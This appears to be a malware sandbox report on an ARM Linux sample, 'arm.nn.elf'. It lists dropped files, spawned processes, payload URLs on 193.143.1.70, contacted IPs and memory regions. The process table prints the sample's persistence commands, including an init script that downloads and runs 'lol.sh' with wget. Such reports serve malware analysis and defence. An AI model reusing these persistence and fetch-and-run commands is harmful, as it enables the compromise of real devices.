Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm.nn.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.3ioRuq (deleted)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm.nn.elf
|
/tmp/arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf
&\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping
arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm.nn.elf /etc/rc.d/S99arm.nn.elf
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/tmp/arm.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/sbin/gdm3
|
-
|
||
|
/etc/gdm3/PrimeOff/Default
|
/etc/gdm3/PrimeOff/Default
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 45 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
151.153.178.142
|
unknown
|
United States
|
||
|
136.114.137.200
|
unknown
|
United States
|
||
|
90.44.180.222
|
unknown
|
France
|
||
|
88.136.43.120
|
unknown
|
France
|
||
|
88.188.170.230
|
unknown
|
France
|
||
|
135.7.59.225
|
unknown
|
United States
|
||
|
3.20.44.119
|
unknown
|
United States
|
||
|
196.239.151.5
|
unknown
|
Tunisia
|
||
|
19.207.121.197
|
unknown
|
United States
|
||
|
18.196.101.88
|
unknown
|
United States
|
||
|
175.126.172.227
|
unknown
|
Korea Republic of
|
||
|
51.140.216.20
|
unknown
|
United Kingdom
|
||
|
171.90.115.129
|
unknown
|
China
|
||
|
7.202.231.75
|
unknown
|
United States
|
||
|
57.158.68.28
|
unknown
|
Belgium
|
||
|
14.42.135.106
|
unknown
|
Korea Republic of
|
||
|
9.102.191.120
|
unknown
|
United States
|
||
|
213.64.186.176
|
unknown
|
Sweden
|
||
|
217.237.196.55
|
unknown
|
Germany
|
||
|
79.1.37.14
|
unknown
|
Italy
|
||
|
216.202.6.36
|
unknown
|
United States
|
||
|
205.200.114.151
|
unknown
|
Canada
|
||
|
137.18.207.159
|
unknown
|
United States
|
||
|
123.174.227.70
|
unknown
|
China
|
||
|
112.47.169.88
|
unknown
|
China
|
||
|
44.193.95.237
|
unknown
|
United States
|
||
|
162.111.168.151
|
unknown
|
United States
|
||
|
130.74.69.15
|
unknown
|
United States
|
||
|
212.226.139.216
|
unknown
|
Finland
|
||
|
14.208.39.79
|
unknown
|
China
|
||
|
59.167.245.175
|
unknown
|
Australia
|
||
|
166.142.19.182
|
unknown
|
United States
|
||
|
105.162.170.173
|
unknown
|
Kenya
|
||
|
13.250.138.173
|
unknown
|
United States
|
||
|
89.114.16.122
|
unknown
|
Portugal
|
||
|
18.190.5.70
|
unknown
|
United States
|
||
|
50.204.10.79
|
unknown
|
United States
|
||
|
120.151.152.100
|
unknown
|
Australia
|
||
|
158.127.210.87
|
unknown
|
Finland
|
||
|
156.34.20.51
|
unknown
|
Canada
|
||
|
55.211.142.110
|
unknown
|
United States
|
||
|
213.55.247.185
|
unknown
|
Switzerland
|
||
|
70.137.254.157
|
unknown
|
United States
|
||
|
138.194.73.8
|
unknown
|
Australia
|
||
|
74.31.26.186
|
unknown
|
United States
|
||
|
37.166.77.45
|
unknown
|
France
|
||
|
106.144.155.95
|
unknown
|
Japan
|
||
|
115.138.114.25
|
unknown
|
Korea Republic of
|
||
|
96.169.243.47
|
unknown
|
United States
|
||
|
212.58.71.55
|
unknown
|
Germany
|
||
|
62.20.93.82
|
unknown
|
Sweden
|
||
|
223.53.26.237
|
unknown
|
Korea Republic of
|
||
|
28.229.52.102
|
unknown
|
United States
|
||
|
122.158.175.167
|
unknown
|
China
|
||
|
147.167.11.107
|
unknown
|
Switzerland
|
||
|
125.209.159.124
|
unknown
|
Australia
|
||
|
198.147.49.105
|
unknown
|
United States
|
||
|
72.130.89.124
|
unknown
|
United States
|
||
|
32.125.200.30
|
unknown
|
United States
|
||
|
70.201.237.197
|
unknown
|
United States
|
||
|
104.84.185.144
|
unknown
|
United States
|
||
|
208.211.54.107
|
unknown
|
United States
|
||
|
111.6.108.117
|
unknown
|
China
|
||
|
206.227.60.56
|
unknown
|
United States
|
||
|
78.233.100.225
|
unknown
|
France
|
||
|
97.36.19.231
|
unknown
|
United States
|
||
|
181.138.55.216
|
unknown
|
Colombia
|
||
|
91.126.182.158
|
unknown
|
Spain
|
||
|
183.48.243.70
|
unknown
|
China
|
||
|
42.167.107.237
|
unknown
|
China
|
||
|
81.212.105.221
|
unknown
|
Turkey
|
||
|
41.146.220.120
|
unknown
|
South Africa
|
||
|
44.65.167.75
|
unknown
|
United States
|
||
|
178.53.140.209
|
unknown
|
Kuwait
|
||
|
182.144.246.140
|
unknown
|
China
|
||
|
216.207.232.134
|
unknown
|
United States
|
||
|
173.80.167.111
|
unknown
|
United States
|
||
|
111.218.164.211
|
unknown
|
Korea Republic of
|
||
|
3.255.46.137
|
unknown
|
United States
|
||
|
218.232.227.182
|
unknown
|
Korea Republic of
|
||
|
141.247.71.99
|
unknown
|
United States
|
||
|
184.120.1.185
|
unknown
|
United States
|
||
|
4.30.213.68
|
unknown
|
United States
|
||
|
159.84.131.9
|
unknown
|
France
|
||
|
171.205.12.95
|
unknown
|
United States
|
||
|
211.164.118.180
|
unknown
|
China
|
||
|
67.173.189.222
|
unknown
|
United States
|
||
|
94.33.178.134
|
unknown
|
Italy
|
||
|
41.167.8.215
|
unknown
|
South Africa
|
||
|
109.148.241.180
|
unknown
|
United Kingdom
|
||
|
153.116.81.76
|
unknown
|
United States
|
||
|
60.206.149.207
|
unknown
|
China
|
||
|
151.155.126.9
|
unknown
|
United States
|
||
|
44.226.3.74
|
unknown
|
United States
|
||
|
185.222.13.94
|
unknown
|
Switzerland
|
||
|
204.95.190.35
|
unknown
|
United States
|
||
|
180.237.142.227
|
unknown
|
Korea Republic of
|
||
|
169.10.231.43
|
unknown
|
United States
|
||
|
7.174.4.254
|
unknown
|
United States
|
||
|
94.172.241.105
|
unknown
|
Netherlands
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7fed5c033000
|
page execute read
|
|
||
|
7fed5c033000
|
page execute read
|
|
||
|
7fee61d59000
|
page read and write
|
|||
|
563906517000
|
page read and write
|
|||
|
7ffe58d08000
|
page execute read
|
|||
|
7fee61675000
|
page read and write
|
|||
|
7fee6080e000
|
page read and write
|
|||
|
7fee610a8000
|
page read and write
|
|||
|
5639062bd000
|
page execute read
|
|||
|
563906517000
|
page read and write
|
|||
|
56390650e000
|
page read and write
|
|||
|
56390852c000
|
page read and write
|
|||
|
7fee610a8000
|
page read and write
|
|||
|
5639062bd000
|
page execute read
|
|||
|
7fee6140a000
|
page read and write
|
|||
|
7fee61bc7000
|
page read and write
|
|||
|
7fed5c03b000
|
page read and write
|
|||
|
7fee61d14000
|
page read and write
|
|||
|
7fee5bfff000
|
page read and write
|
|||
|
7fee61016000
|
page read and write
|
|||
|
7fee619e6000
|
page read and write
|
|||
|
7ffe58ce4000
|
page read and write
|
|||
|
563908515000
|
page execute and read and write
|
|||
|
56390650e000
|
page read and write
|
|||
|
563908515000
|
page execute and read and write
|
|||
|
7fee61804000
|
page read and write
|
|||
|
7fee5bfff000
|
page read and write
|
|||
|
56390852c000
|
page read and write
|
|||
|
7fed5c03f000
|
page read and write
|
|||
|
563909bc9000
|
page read and write
|
|||
|
7fee61675000
|
page read and write
|
|||
|
7fee61698000
|
page read and write
|
|||
|
7fee61bc7000
|
page read and write
|
|||
|
7fee6140a000
|
page read and write
|
|||
|
7fee61cf0000
|
page read and write
|
|||
|
7fee61cf0000
|
page read and write
|
|||
|
7ffe58d08000
|
page execute read
|
|||
|
7fee5c021000
|
page read and write
|
|||
|
7fed5c044000
|
page read and write
|
|||
|
7fee5c021000
|
page read and write
|
|||
|
7fee61016000
|
page read and write
|
|||
|
7ffe58ce4000
|
page read and write
|
|||
|
7fee6080e000
|
page read and write
|
|||
|
7fed5c03b000
|
page read and write
|
|||
|
7fee619e6000
|
page read and write
|
|||
|
7fee61698000
|
page read and write
|
|||
|
7fed5c03f000
|
page read and write
|
|||
|
563909bc9000
|
page read and write
|
|||
|
7fee61d59000
|
page read and write
|
|||
|
7fee61804000
|
page read and write
|
|||
|
7fee61d14000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.